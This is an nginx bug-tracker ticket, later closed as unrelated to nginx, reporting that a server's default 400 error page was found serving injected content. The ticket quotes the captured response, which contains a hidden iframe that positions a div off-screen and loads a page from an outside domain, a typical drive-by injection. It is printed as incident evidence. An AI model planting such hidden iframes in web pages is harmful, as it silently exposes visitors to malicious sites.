Opened 12 years ago
Closed 12 years ago
#244 closed defect (invalid)
Injection in HTTP special response
| Reported by: | www.google.com/accounts/o8/id?id=AItOawluN7sETdPjzS-XDW9NVBS_yKZdwZ4THvs | Owned by: | somebody |
|---|---|---|---|
| Priority: | critical | Milestone: | |
| Component: | private | Version: | 1.2.x |
| Keywords: | Cc: | ||
| uname -a: | Linux 2.6.32-5-amd64 #1 SMP Sun May 6 04:00:17 UTC 2012 x86_64 GNU/Linux | ||
| nginx -V: |
nginx version: nginx/1.2.3
built by gcc 4.4.5 (Debian 4.4.5-8) TLS SNI support enabled configure arguments: --with-http_realip_module --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --pid-path=/var/run/nginx.pid --http-log-path=/var/log/nginx/access.log --lock-path=/var/lock/nginx.lock --with-http_dav_module --http-client-body-temp-path=/proxy/var/body --http-proxy-temp-path=/proxy/var/proxy --http-fastcgi-temp-path=/proxy/var/fastcgi --with-http_ssl_module --with-http_stub_status_module --with-http_flv_module |
||
Description
I have a server configured, among other things, to return a 400 code to all requests using an unrecognized server_name (or not Host header at all):
server {
listen 80 default backlog=2048;
listen 443 default backlog=2048 ssl;
server_name _;
access_log off;
location / {
return 400;
}
}
So you would normally get this:
Escape character is '^]'. GET / HTTP/1.0 HTTP/1.1 400 Bad Request Server: nginx/1.2.3 Date: Wed, 07 Nov 2012 09:18:03 GMT Content-Type: text/html Content-Length: 172 Connection: close <html> <head><title>400 Bad Request</title></head> <body bgcolor="white"> <center><h1>400 Bad Request</h1></center> <hr><center>nginx/1.2.3</center> </body> </html> Connection closed by foreign host.
Yesterday I noticed that some hacker somehow managed to inject an iframe in it:
Escape character is '^]'.
GET / HTTP/1.1
HTTP/1.1 400 Bad Request
Server: nginx/1.2.3
Date: Wed, 07 Nov 2012 00:01:24 GMT
Content-Type: text/html
Content-Length: 353
Connection: close
<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white"><style>.kzur45{position:absolute;left:-5000px; top:-5000px}</style><div class="kzur45"><iframe src="http://sourcesclothes.net/links/categorys_news-links-pattern.php"></iframe></div>
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.2.3</center>
</boHTTP/1.1 400 BConnection closed by foreign host.
Nginx files were not modified (compared md5s to the originals), and restarting it restored things back to normal.
I unfortunately don't have more information - I went through logs of the previous days and was unable to find anything suspicious.
It looks like something either messed with the predefined responses in ngx_http_special_response.c, or somewhere down the chain. If the former, a safety net may be to make those strings or structures (e.g. ngx_http_error_400_page) 'static const' so that they would normally end up in .rodata memory?
Change History (2)
comment:1 by , 12 years ago
| Component: | nginx-core → private |
|---|
comment:2 by , 12 years ago
| Resolution: | → invalid |
|---|---|
| sensitive: | → 0 |
| Status: | new → closed |
The sumbitter reported privately that the problem didn't relate to nginx.